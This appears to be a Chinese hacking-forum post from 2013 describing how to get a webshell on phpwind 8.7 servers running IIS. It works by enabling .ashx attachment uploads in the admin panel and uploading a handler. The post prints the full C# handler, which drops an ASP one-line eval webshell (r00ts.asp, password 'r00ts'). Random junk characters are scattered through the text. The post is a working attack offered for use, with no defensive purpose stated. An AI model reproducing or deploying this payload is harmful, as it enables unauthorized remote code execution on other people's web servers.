找回密码
 立即注册
查看: 3127|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
) s4 l( V8 m  ?3 [3 g' B
  g8 C/ P+ B# m% `" w群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx4 l: u2 R: ~4 U) V9 [% x

# ]5 W% a, e& s! ]) k; ^7 o/ P发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
- D6 S) e( R0 m+ n( I* d. P4 j4 ^ " l2 K7 M7 s6 s# N4 V  h% k2 ^, T6 w
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
# L! a* m/ t1 e 3 v. |" |5 }% E
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts7 L  k8 O2 U( d4 I7 b+ N4 [
) k" g7 }( r% L/ r0 c
下面是代码:
1 F. i( d9 d9 N0 J 6 r; Q6 w" Q: O9 T" }
<%@ WebHandler Language="C#"Class="Handler" %>, E9 k; ~( l# X3 o  S" R/ A) p3 m0 T
using System;
& r: }6 \* W  L: a6 E0 W. ousing System.Web;
( x+ g- A- E. D5 rusing System.IO;; M+ A# [, W2 @: u
public class Handler : IHttpHandler {* m2 R$ W9 k% \2 Q' Z, V3 z# o5 t
public void ProcessRequest (HttpContext context) {
, R) T. I$ O$ O; p) F4 o2 @context.Response.ContentType = "text/plain";
( q8 c5 {: C* m) BStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
2 e$ q) n7 k' F) M! d/ }+ sfile1.Write("<%eval request(\"r00ts\")%>");
, {, v* t) f- X# Z; f5 kfile1.Flush();; y7 n5 A( v; q
file1.Close();& p9 m) X  y( m) ?5 |& t* [. z
}  I3 X1 V3 X( ?* Y+ P  i
public bool IsReusable {2 V8 E; _4 F; [" W' q4 y- `
get {
) R" }) b  F  k8 H8 I( l9 |return false;  v& R& q2 L4 j  `' [3 L
}8 u, v+ }- Z/ x' [  A+ P6 N$ b
}3 J- s- {% @* Y  b
}; y; V# t& ~# F* p$ P( a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表